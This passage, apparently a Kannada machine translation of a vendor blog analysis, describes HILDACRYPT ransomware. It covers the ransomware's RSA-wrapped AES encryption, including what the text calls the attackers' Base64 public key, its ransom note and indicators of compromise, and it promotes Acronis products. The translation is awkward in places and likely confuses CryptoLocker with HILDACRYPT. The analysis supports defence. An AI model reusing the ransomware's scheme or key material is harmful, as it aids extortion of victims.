28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

AES ಫೈಲ್ ಕೀಲಿಯನ್ನು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲು RSA ಸಾರ್ವಜನಿಕ ಕೀಲಿಯನ್ನು ಬಳಸಲಾಗುತ್ತದೆ. RSA ಸಾರ್ವಜನಿಕ ಕೀಯನ್ನು Base64 ಎನ್‌ಕೋಡ್ ಮಾಡಲಾಗಿದೆ ಮತ್ತು ಮಾಡ್ಯುಲಸ್ ಮತ್ತು ಸಾರ್ವಜನಿಕ ಘಾತಾಂಕ 65537 ಅನ್ನು ಒಳಗೊಂಡಿರುತ್ತದೆ. ಡೀಕ್ರಿಪ್ಶನ್‌ಗೆ ಆಕ್ರಮಣಕಾರರು ಹೊಂದಿರುವ RSA ಖಾಸಗಿ ಕೀ ಅಗತ್ಯವಿದೆ.

RSA ಗೂಢಲಿಪೀಕರಣದ ನಂತರ, ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಫೈಲ್‌ನಲ್ಲಿ ಸಂಗ್ರಹವಾಗಿರುವ Base64 ಅನ್ನು ಬಳಸಿಕೊಂಡು AES ಕೀಲಿಯನ್ನು ಎನ್‌ಕೋಡ್ ಮಾಡಲಾಗುತ್ತದೆ.

ಸುಲಿಗೆ ಸಂದೇಶ

ಗೂಢಲಿಪೀಕರಣ ಪೂರ್ಣಗೊಂಡ ನಂತರ, HILDACRYPT html ಫೈಲ್ ಅನ್ನು ಅದು ಫೈಲ್‌ಗಳನ್ನು ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಿದ ಫೋಲ್ಡರ್‌ಗೆ ಬರೆಯುತ್ತದೆ. ransomware ಅಧಿಸೂಚನೆಯು ಎರಡು ಇಮೇಲ್ ವಿಳಾಸಗಳನ್ನು ಒಳಗೊಂಡಿದೆ, ಅಲ್ಲಿ ಬಲಿಪಶು ಆಕ್ರಮಣಕಾರರನ್ನು ಸಂಪರ್ಕಿಸಬಹುದು.

ಹಿಲ್ಡಾಕ್ರಿಪ್ಟ್: ಹೊಸ ransomware ಬ್ಯಾಕಪ್ ಸಿಸ್ಟಮ್‌ಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳನ್ನು ಹಿಟ್ ಮಾಡುತ್ತದೆ

ಸುಲಿಗೆ ಸೂಚನೆಯು "ನೋ ಲೋಲಿ ಸುರಕ್ಷಿತವಲ್ಲ;)" ಎಂಬ ಸಾಲನ್ನು ಸಹ ಒಳಗೊಂಡಿದೆ - ಜಪಾನ್‌ನಲ್ಲಿ ನಿಷೇಧಿಸಲಾದ ಚಿಕ್ಕ ಹುಡುಗಿಯರ ನೋಟವನ್ನು ಹೊಂದಿರುವ ಅನಿಮೆ ಮತ್ತು ಮಂಗಾ ಪಾತ್ರಗಳ ಉಲ್ಲೇಖ.

ತೀರ್ಮಾನಕ್ಕೆ

HILDACRYPT, ಹೊಸ ransomware ಕುಟುಂಬ, ಹೊಸ ಆವೃತ್ತಿಯನ್ನು ಬಿಡುಗಡೆ ಮಾಡಿದೆ. ಎನ್‌ಕ್ರಿಪ್ಶನ್ ಮಾದರಿಯು ಬಲಿಪಶುವನ್ನು ransomware ನಿಂದ ಎನ್‌ಕ್ರಿಪ್ಟ್ ಮಾಡಲಾದ ಫೈಲ್‌ಗಳನ್ನು ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡುವುದನ್ನು ತಡೆಯುತ್ತದೆ. ಬ್ಯಾಕಪ್ ವ್ಯವಸ್ಥೆಗಳು ಮತ್ತು ಆಂಟಿವೈರಸ್ ಪರಿಹಾರಗಳಿಗೆ ಸಂಬಂಧಿಸಿದ ರಕ್ಷಣೆ ಸೇವೆಗಳನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಲು ಕ್ರಿಪ್ಟೋಲಾಕರ್ ಸಕ್ರಿಯ ರಕ್ಷಣೆ ವಿಧಾನಗಳನ್ನು ಬಳಸುತ್ತದೆ. HILDACRYPT ನ ಲೇಖಕರು ನೆಟ್‌ಫ್ಲಿಕ್ಸ್‌ನಲ್ಲಿ ತೋರಿಸಿರುವ ಹಿಲ್ಡಾ ಎಂಬ ಅನಿಮೇಟೆಡ್ ಸರಣಿಯ ಅಭಿಮಾನಿಯಾಗಿದ್ದಾರೆ, ಅದರ ಟ್ರೇಲರ್‌ಗೆ ಲಿಂಕ್ ಪ್ರೋಗ್ರಾಂನ ಹಿಂದಿನ ಆವೃತ್ತಿಯ ಖರೀದಿ ಪತ್ರದಲ್ಲಿದೆ.

ಅದೇ ತರ, ಅಕ್ರೊನಿಸ್ ಬ್ಯಾಕಪ್ и ಎಕ್ರೊನಿಸ್ ಟ್ರೂ ಇಮೇಜ್ HILDACRYPT ransomware ನಿಂದ ನಿಮ್ಮ ಕಂಪ್ಯೂಟರ್ ಅನ್ನು ರಕ್ಷಿಸಬಹುದು ಮತ್ತು ಪೂರೈಕೆದಾರರು ತಮ್ಮ ಗ್ರಾಹಕರನ್ನು ರಕ್ಷಿಸುವ ಸಾಮರ್ಥ್ಯವನ್ನು ಹೊಂದಿದ್ದಾರೆ ಅಕ್ರೊನಿಸ್ ಬ್ಯಾಕಪ್ ಮೇಘ. ಈ ಪರಿಹಾರಗಳು ಸೇರಿವೆ ಎಂಬ ಅಂಶದಿಂದ ರಕ್ಷಣೆಯನ್ನು ಖಾತ್ರಿಪಡಿಸಲಾಗಿದೆ ಸೈಬರ್ ಭದ್ರತೆ ಬ್ಯಾಕ್‌ಅಪ್ ಮಾತ್ರವಲ್ಲದೆ ನಮ್ಮ ಸಮಗ್ರ ರಕ್ಷಣೆ ವ್ಯವಸ್ಥೆಯನ್ನು ಸಹ ಒಳಗೊಂಡಿದೆ ಅಕ್ರೊನಿಸ್ ಸಕ್ರಿಯ ರಕ್ಷಣೆ - ಯಂತ್ರ ಕಲಿಕೆಯ ಮಾದರಿಯಿಂದ ನಡೆಸಲ್ಪಡುತ್ತಿದೆ ಮತ್ತು ನಡವಳಿಕೆಯ ಹ್ಯೂರಿಸ್ಟಿಕ್ಸ್ ಅನ್ನು ಆಧರಿಸಿದೆ, ಇದು ಶೂನ್ಯ-ದಿನದ ransomware ಬೆದರಿಕೆಯನ್ನು ಎದುರಿಸಲು ಸಮರ್ಥವಾಗಿದೆ.

ರಾಜಿ ಸೂಚಕಗಳು

ಫೈಲ್ ವಿಸ್ತರಣೆ HCY!
HILDACRYPTReadMe.html
xamp.exe ಒಂದು ಅಕ್ಷರ "p" ಮತ್ತು ಡಿಜಿಟಲ್ ಸಹಿ ಇಲ್ಲ
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

ಮೂಲ: www.habr.com

ಕಾಮೆಂಟ್ ಅನ್ನು ಸೇರಿಸಿ